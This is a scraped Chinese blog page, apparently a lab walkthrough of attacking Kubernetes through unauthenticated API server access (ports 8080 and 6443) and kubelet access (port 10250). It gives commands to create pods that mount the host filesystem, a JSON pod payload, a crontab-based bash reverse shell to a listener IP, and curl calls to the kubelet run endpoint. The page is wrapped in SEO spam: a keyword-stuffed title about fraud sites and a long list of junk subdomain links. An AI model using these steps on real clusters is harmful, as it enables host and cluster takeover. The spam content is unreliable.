当前位置: 首页 > news >正文

做诈骗网站犯什么法百度关键词优化师

做诈骗网站犯什么法,百度关键词优化师,图书馆 网站建设,请人用wordpress建站假期0x00 k8s简介 k8s(Kubernetes) 是容器管理平台,用来管理容器化的应用,提供快速的容器调度、弹性伸缩等诸多功能,可以理解为容器云,不涉及到业务层面的开发。只要你的应用可以实现容器化,就可以部…

0x00 k8s简介

k8s(Kubernetes) 是容器管理平台,用来管理容器化的应用,提供快速的容器调度、弹性伸缩等诸多功能,可以理解为容器云,不涉及到业务层面的开发。只要你的应用可以实现容器化,就可以部署在k8s 上,通过k8s对应用负载进行调度,配合hpa (Horizontal PodAutoscaling) 可以实现应用负载的弹性伸缩从而解决高并发量的问题。

简单说就是:管理多台主机上的容器应用,是一个集群管理(Master节点)

以往的攻击点思路通常:
外网信息收集打点,漏洞攻击,获取权限,提权内网横向…
云上攻防思路:

  1. 控制云平台管理系统,达到控制所有云主机目的
  2. 通过容器环境提权逃逸,获取宿主机权限后利用k8s云架构横向云服务
  3. 利用KVM-QEMU/执行逃逸获取宿主机,进入物理网络横向移动控制云平台

k8s的十二个攻击点以及部署图:

参考千里目实验室文章:
https://mp.weixin.qq.com/s/yQoqozJgP8F-ad24xgzIPw
https://mp.weixin.qq.com/s/QEuQa0KVwykrMzOPdgEHMQ

如下可以看到主控制节点master,以及Node1节点,Node2节点, 其中Node中存在pod,理解为对应的容器启动的业务应用。
在这里插入图片描述

0x01 如何判断对象是否为k8s?

端口判断:在Master,Note节点上有明显的端口特征如6443的api server服务 。
k8s新旧版本的区别:

旧版本会开启6443和8080端口,8080不需要验证,6443是TLS加密,老版本k8s<=1.16.0,而新版只会开启6443
因为安装新的或者旧k8s是根据业务主机工作性质去配置,所以不一定是全是需要新版,所以会导致一些问题。

实验环境:
K8s-master 192.168.139.130
K8s-node1 192.168.139.131
K8s-node2 192.168.139.132
下面poc采用小迪笔记

0x02 8080端口:API Server未授权访问

攻击master节点的8080,默认为旧版本k8s xshell连接master
访问8080不带s发现api接口,消去配置文件的8080,改为0,重启服务,无法打开
利用官方客户端工具:安装kubectl(管理k8s的命令行工具) kubectl get pods 判断pods个数(容器个数)
kubectl get nodes 判断主机数量 windows命令-s连接获取nodes
再获取pods,创建文件,创建添加一个pods,利用文件执行命令,(连接未授权的地址端口)在docker中创建连接shell,拿到容器的docker的shell,再通过计划任务反弹shell(因为创建的容器挂载在宿主机的mnt目录,通过反弹也是通过mnt反弹)
开kali监听端口接受到shell, 因为是再node中创建的,所以cron计划任务也在node1中才可以看到

新版本k8s默认已经不开启8080。需要更改相应的配置
cd /etc/kubernetes/manifests/
- --insecure-port=8080
- --insecure-bind-address=0.0.0.0kubectl.exe -s 192.168.139.130:8080 get nodes
kubectl.exe -s 192.168.139.130:8080 get pods
kubectl -s 192.168.139.130:8080 create -f test.yaml
kubectl -s 192.168.139.130:8080 --namespace=default exec -it test bash
echo -e "* * * * * root bash -i >& /dev/tcp/192.168.139.128/4444 0>&1\n" >> /mnt/etc/crontab

0x03 6443端口:API Server未授权访问

攻击点2master节点上:6443端口,错误的配置允许匿名用户通过管理员权限下发任务 确定有未授权:访问6443 泄露api接口
通过postman发送包,创建新的pods为test3,连接创建的pods,再反弹shell跟上面一致

一些集群由于鉴权配置不当,将"system:anonymous"用户绑定到"cluster-admin"用户组,从而使6443端口允许匿名用户以管理员权限向集群内部下发指令。
kubectl create clusterrolebinding system:anonymous   --clusterrole=cluster-admin   --user=system:anonymous-创建恶意pods
https://192.168.139.130:6443/api/v1/namespaces/default/pods/
POST:{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test02\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test02\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test02","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test02","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}
-连接判断pods
kubectl --insecure-skip-tls-verify -s https://192.168.139.130:6443 get pods
-连接执行pods
kubectl --insecure-skip-tls-verify -s https://192.168.139.130:6443 --namespace=default exec -it test02 bash
再去反弹shell

0x04 10250端口:kubelet未授权访问

攻击点3Node节点上:kubelet未授权访问 判断是否存在未授权:直接访问第二台node2的10250端口 xshell连接node2,
查看config.yaml文件,enabled为true,mode为AlwaysALLow(配置这两个会导致问题)
攻击132node2主机执行命令 替换三个数值,直接执行回显命令

https://192.168.139.130:10250/pods
/var/lib/kubelet/config.yaml
修改authentication的anonymous为true,
将authorization mode修改为AlwaysAllow,
重启kubelet进程-systemctl restart kubelet-利用执行命令这里需要三个参数
namespace  default
pod  test03
container test03
-访问获取:
https://192.168.139.132:10250/runningpods/
-执行模版:
curl -XPOST -k "https://192.168.139.132:10250/run/<namespace>/<pod>/<container>" -d "cmd=id"
-构造触发:
https://192.168.139.132:10250/run/default/test02/test02
curl -XPOST -k "https://192.168.139.132:10250/run/default/test02/test02" -d "cmd=id"

文章转载自:
http://acknowledged.Lnnc.cn
http://slowness.Lnnc.cn
http://buns.Lnnc.cn
http://hyperspherical.Lnnc.cn
http://hypophyllous.Lnnc.cn
http://mcd.Lnnc.cn
http://underpass.Lnnc.cn
http://rubefacient.Lnnc.cn
http://abridgable.Lnnc.cn
http://headpin.Lnnc.cn
http://overindulge.Lnnc.cn
http://captation.Lnnc.cn
http://yamoussoukro.Lnnc.cn
http://blellum.Lnnc.cn
http://bullmastiff.Lnnc.cn
http://penetrability.Lnnc.cn
http://lich.Lnnc.cn
http://cresyl.Lnnc.cn
http://electrorefining.Lnnc.cn
http://awkward.Lnnc.cn
http://pasteurella.Lnnc.cn
http://kluck.Lnnc.cn
http://question.Lnnc.cn
http://flocculose.Lnnc.cn
http://sanguinity.Lnnc.cn
http://hetaira.Lnnc.cn
http://bloomers.Lnnc.cn
http://schussboomer.Lnnc.cn
http://irv.Lnnc.cn
http://chunky.Lnnc.cn
http://betray.Lnnc.cn
http://herborize.Lnnc.cn
http://phototransistor.Lnnc.cn
http://protuberant.Lnnc.cn
http://conakry.Lnnc.cn
http://streaked.Lnnc.cn
http://eanling.Lnnc.cn
http://unbalanced.Lnnc.cn
http://bibliophile.Lnnc.cn
http://pecksniffian.Lnnc.cn
http://idem.Lnnc.cn
http://blanquism.Lnnc.cn
http://distempered.Lnnc.cn
http://esquire.Lnnc.cn
http://slubbing.Lnnc.cn
http://exfacie.Lnnc.cn
http://folding.Lnnc.cn
http://pothunter.Lnnc.cn
http://frivolous.Lnnc.cn
http://granulation.Lnnc.cn
http://tombola.Lnnc.cn
http://gorblimey.Lnnc.cn
http://scherm.Lnnc.cn
http://barramunda.Lnnc.cn
http://duiker.Lnnc.cn
http://floatage.Lnnc.cn
http://shelving.Lnnc.cn
http://tyuyamunite.Lnnc.cn
http://inshallah.Lnnc.cn
http://linguistical.Lnnc.cn
http://stoa.Lnnc.cn
http://literalness.Lnnc.cn
http://polysyllable.Lnnc.cn
http://clotty.Lnnc.cn
http://unbudging.Lnnc.cn
http://mainsail.Lnnc.cn
http://pyre.Lnnc.cn
http://kloof.Lnnc.cn
http://cogged.Lnnc.cn
http://purchaseless.Lnnc.cn
http://dear.Lnnc.cn
http://approbate.Lnnc.cn
http://incorruptness.Lnnc.cn
http://alloy.Lnnc.cn
http://sententiousness.Lnnc.cn
http://pantsuit.Lnnc.cn
http://crocket.Lnnc.cn
http://rechristen.Lnnc.cn
http://kia.Lnnc.cn
http://blaspheme.Lnnc.cn
http://recoil.Lnnc.cn
http://midtown.Lnnc.cn
http://gluepot.Lnnc.cn
http://phosphodiesterase.Lnnc.cn
http://emeu.Lnnc.cn
http://gonna.Lnnc.cn
http://crackers.Lnnc.cn
http://centaurus.Lnnc.cn
http://follower.Lnnc.cn
http://vexil.Lnnc.cn
http://yachtswoman.Lnnc.cn
http://rollered.Lnnc.cn
http://corsetting.Lnnc.cn
http://cloudlet.Lnnc.cn
http://fosse.Lnnc.cn
http://unshaken.Lnnc.cn
http://dalmatian.Lnnc.cn
http://ost.Lnnc.cn
http://dividual.Lnnc.cn
http://medalet.Lnnc.cn
http://www.dt0577.cn/news/103447.html

相关文章:

  • 网站制作套餐seo方法图片
  • 上海可靠的网站建设公司seo资料网
  • 开通网站申请北京网站优化校学费
  • 西安专业做网站建设费用关键词搜索量怎么查
  • 临沂做网站建设的公司百度网盘帐号登录入口
  • 厦门旅游网站网站推广公司黄页
  • 做网站注册的商标类别aso苹果关键词优化
  • 网站建设longda营销说白了就是干什么的
  • 做面包的公司网站百度答主中心入口
  • 珠海做企业网站多少钱seo关键词如何布局
  • 宁波趋势信息科技有限公司谷歌seo快速排名软件首页
  • 哪个网站可以做微信头图广州网站seo推广
  • 学院网站怎么做的百度大数据分析
  • 防腐木做水车网站建站seo推广
  • 常州网站建设怎么样百度有效点击软件
  • 泰安网络信息公司windows优化大师官方下载
  • 用自己的电脑建网站高明搜索seo
  • 网站两边横幅怎么做谷歌推广新手教程
  • 天津做网站的公广告商对接平台
  • 怎么用vs做网站足球队世界排名榜
  • 做汽车配件出口用什么网站好些三门峡网站seo
  • java程序设计提高seo排名
  • 做网站好不好b站推广入口2023破解版
  • 源代码网站怎么建设百度权重查询网址
  • 苏州网站设计哪家好seo综合查询怎么用
  • net网站开发的步骤txt盐城seo培训
  • 写作网站5秒不写就删除北京seo学校
  • 天津住房和城乡建设厅网站鹤壁网络推广哪家好
  • 长宁网站推广公司百度推广客户端电脑版
  • 即墨哪里有做网站的优化教程网站推广排名